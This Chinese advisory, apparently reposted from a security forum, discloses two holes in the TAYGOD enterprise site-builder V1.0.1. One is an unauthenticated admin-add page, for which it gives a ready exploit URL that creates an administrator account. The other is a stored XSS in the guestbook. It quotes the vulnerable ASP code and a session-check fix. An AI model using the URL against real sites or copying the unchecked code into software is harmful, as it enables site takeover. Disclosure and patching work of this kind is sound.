影响版本:TAYGOD免费企业建站系统V1.0.1
源码下载地址:
①无验证添加管理员
漏洞文件:Admin_Add.asp
漏洞代码:
<!--#include file="../../config/conn.asp"-->
<!--#include file="md5.asp"-->
<%
if request.QueryString("action")="save" then
uid=replace(trim(Request("uid")),"'","")
realname=replace(trim(Request("realname")),"'","")
pwd1=replace(trim(Request("pwd1")),"'","")
pwd2=replace(trim(Request("pwd2")),"'","")
password=md5(pwd1)原因:未进行验证直接写入数据
利用方案:构造URL
/source/admin/Admin_Add.asp?action=save&uid=test&realname=test&pwd1=123456&pwd2=123456
这样就能添加进去一个帐号为test,密码为123456的管理员用户
修补方案:加入判断代码
if session("admin")="" then
response.Write "<script language='javascript'>alert('网络超时或您还没有登陆!');window.location.href='login.asp';</script>"
response.End
end if②留言本XSS漏洞
漏洞文件:Message.asp
漏洞代码:
if request.QueryString("action")="save" then
username=trim(request("username"))
email=trim(request("email"))
tel=trim(request("tel"))
zhiwu=trim(request("zhiwu"))
city=trim(request("city"))
qq=trim(request("qq"))
add=trim(request("add"))
title=trim(request("title"))
content=trim(request("content"))
messageip=Request.ServerVariables("REMOTE_ADDR")
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from TAY_message",conn,1,3原因:未过滤,后台照样能够执行
转自:90sec.org
,www.xuhantao.com,涛涛电脑知识网
TAYGOD免费企业建站系统V1.0.1添加管理员及留言本XSS
时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:
相关文章
- 没有相关文章
本类热门
- 05-19·记事狗2.5.0鸡肋注入漏洞
- 05-19·动易xss拿站小记
- 04-19·记一次有趣的提权
- 04-19·TNTHK小组内部版后门解析
- 05-19·新版百度空间存储型XSS
- 04-19·ecmall 2.3.0-0918-scgbk注入及修复
- 05-19·Z-Blog1.8绕过权限漏洞
- 05-19·ThinkPHP最新版3.0RC1存在XSS漏洞
- 04-19·Wordpree插件评论啦代码审计不严
- 04-19·绕过CDN查找真实IP的思路,一个新颖并另类的方法
本类推荐
- 05-19·IIS7.5畸形解析拿shell利用方法
- 05-19·从对一个安全产品的测试看产品架构安全
- 05-19·mysql被降权提权思路
- 05-19·记一次win2003垃圾提权
本类固顶
- 暂无信息
网站备案号:蒙ICP备15000590号-1